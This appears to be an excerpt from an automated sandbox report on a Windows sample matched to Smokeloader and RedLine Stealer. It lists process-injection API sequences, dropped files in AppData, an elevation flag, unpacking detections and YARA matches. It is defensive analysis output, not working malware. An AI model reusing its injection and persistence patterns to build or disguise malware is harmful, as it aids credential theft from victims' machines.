Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,	6_2_00403043
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_00401508 NtAllocateVirtualMemory,	6_2_00401508
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004014CF NtAllocateVirtualMemory,	6_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004014DE NtAllocateVirtualMemory,	6_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004014F5 NtAllocateVirtualMemory,	6_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004014F8 NtAllocateVirtualMemory,	6_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_004014FB NtAllocateVirtualMemory,	6_2_004014FB
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_00403043 RtlCreateUserThread,NtTerminateProcess,	12_2_00403043
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_004014C4
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_00401508 NtAllocateVirtualMemory,	12_2_00401508
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004014CF NtAllocateVirtualMemory,	12_2_004014CF
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_004015D5
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004014DE NtAllocateVirtualMemory,	12_2_004014DE
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_004015DF
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_004015E6
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	12_2_004015F2
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004014F5 NtAllocateVirtualMemory,	12_2_004014F5
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004014F8 NtAllocateVirtualMemory,	12_2_004014F8
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_004014FB NtAllocateVirtualMemory,	12_2_004014FB

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_004167C0	0_2_004167C0
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_004167C0	5_2_004167C0
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_00416EC0	6_2_00416EC0
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Code function: 6_2_0078D0D5	6_2_0078D0D5
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_0000000140007830	7_2_0000000140007830
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_0000000140013480	7_2_0000000140013480
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014001F0A0	7_2_000000014001F0A0
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014000D110	7_2_000000014000D110
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_0000000140018514	7_2_0000000140018514
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014001ED80	7_2_000000014001ED80
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_00000001400109D0	7_2_00000001400109D0
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014000FA70	7_2_000000014000FA70
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_00000001400066A8	7_2_00000001400066A8
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014001F394	7_2_000000014001F394
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014001EFB1	7_2_000000014001EFB1
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Code function: 7_2_000000014001DFCC	7_2_000000014001DFCC
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 12_2_00416EC0	12_2_00416EC0
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 13_2_00416EC0	13_2_00416EC0
Source: C:\Users\user\AppData\Roaming\bbdeaec	Code function: 13_2_004021E8	13_2_004021E8
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 14_2_004167C0	14_2_004167C0
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 14_2_004021E8	14_2_004021E8

Source: HaPJ2rPP6w.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2756065052.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1783719870.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000006.00000002.2399489660.000000000078D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.2399641073.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2757264209.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000C.00000002.2756823088.0000000000631000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.2399602012.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2756188540.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2054076985.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2054000125.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2054109145.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: HaPJ2rPP6w.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C12E.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bbdeaec.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wideaec.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/6@30/4

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_000000014000C7F4 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,??2@YAPEAX_K@Z,lstrcpyW,lstrcpyW,??3@YAXPEAX@Z,LocalFree,

7_2_000000014000C7F4

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_000000014000121C GetDiskFreeSpaceExW,SendMessageW,

7_2_000000014000121C

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe

Code function: 0_2_00851503 CreateToolhelp32Snapshot,Module32First,

0_2_00851503

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_000000014000C438 GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,GetDlgItem,SetWindowLongPtrW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,

7_2_000000014000C438

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_000000014000222C GetModuleHandleW,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,

7_2_000000014000222C

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wideaec

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\C12E.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\bbdeaec	Command line argument: `<@		13_2_00403BB0
Source: C:\Users\user\AppData\Roaming\wideaec	Command line argument: `<@		14_2_00403BB0

Source: HaPJ2rPP6w.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HaPJ2rPP6w.exe

ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\HaPJ2rPP6w.exe "C:\Users\user\Desktop\HaPJ2rPP6w.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wideaec C:\Users\user\AppData\Roaming\wideaec
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C12E.exe C:\Users\user\AppData\Local\Temp\C12E.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\89ED.exe C:\Users\user\AppData\Local\Temp\89ED.exe
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Process created: C:\Users\user\AppData\Local\Temp\89ED.exe "C:\Users\user\AppData\Local\Temp\89ED.exe" -sfxelevation
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bbdeaec C:\Users\user\AppData\Roaming\bbdeaec
Source: unknown	Process created: C:\Users\user\AppData\Roaming\bbdeaec C:\Users\user\AppData\Roaming\bbdeaec
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wideaec C:\Users\user\AppData\Roaming\wideaec
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C12E.exe C:\Users\user\AppData\Local\Temp\C12E.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\89ED.exe C:\Users\user\AppData\Local\Temp\89ED.exe	Jump to behavior

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Section loaded: gavosebisiv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Section loaded: gavosebisiv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wideaec	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Section loaded: gavosebisiv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89ED.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Section loaded: gavosebisiv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\bbdeaec	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Unpacked PE file: 0.2.HaPJ2rPP6w.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xezuxe:W;.tls:W;.yuvatom:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wideaec	Unpacked PE file: 5.2.wideaec.400000.0.unpack .text:ER;.rdata:R;.data:W;.xezuxe:W;.tls:W;.yuvatom:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\C12E.exe	Unpacked PE file: 6.2.C12E.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tasifal:W;.tls:W;.cuda:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\bbdeaec	Unpacked PE file: 12.2.bbdeaec.400000.0.unpack .text:ER;.rdata:R;.data:W;.tasifal:W;.tls:W;.cuda:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\89ED.exe

Code function: 7_2_00000001400029DC LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

7_2_00000001400029DC

Source: 89ED.exe.1.dr

Static PE information: real checksum: 0xe565d should be: 0x1fc25b

Source: HaPJ2rPP6w.exe	Static PE information: section name: .xezuxe
Source: HaPJ2rPP6w.exe	Static PE information: section name: .yuvatom
Source: C12E.exe.1.dr	Static PE information: section name: .tasifal
Source: C12E.exe.1.dr	Static PE information: section name: .cuda
Source: bbdeaec.1.dr	Static PE information: section name: .tasifal
Source: bbdeaec.1.dr	Static PE information: section name: .cuda
Source: wideaec.1.dr	Static PE information: section name: .xezuxe
Source: wideaec.1.dr	Static PE information: section name: .yuvatom

Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_006B1540 pushad ; ret	0_2_006B1550
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_0084E4EC pushad ; retf	0_2_0084E4ED
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00853DFC pushfd ; iretd	0_2_00853DFD
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_008532FF push B63524ADh; retn 001Fh	0_2_00853336
Source: C:\Users\user\Desktop\HaPJ2rPP6w.exe	Code function: 0_2_00854F5C push esp; ret	0_2_00854F5E
Source: C:\Users\user\AppData\Roaming\wideaec	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
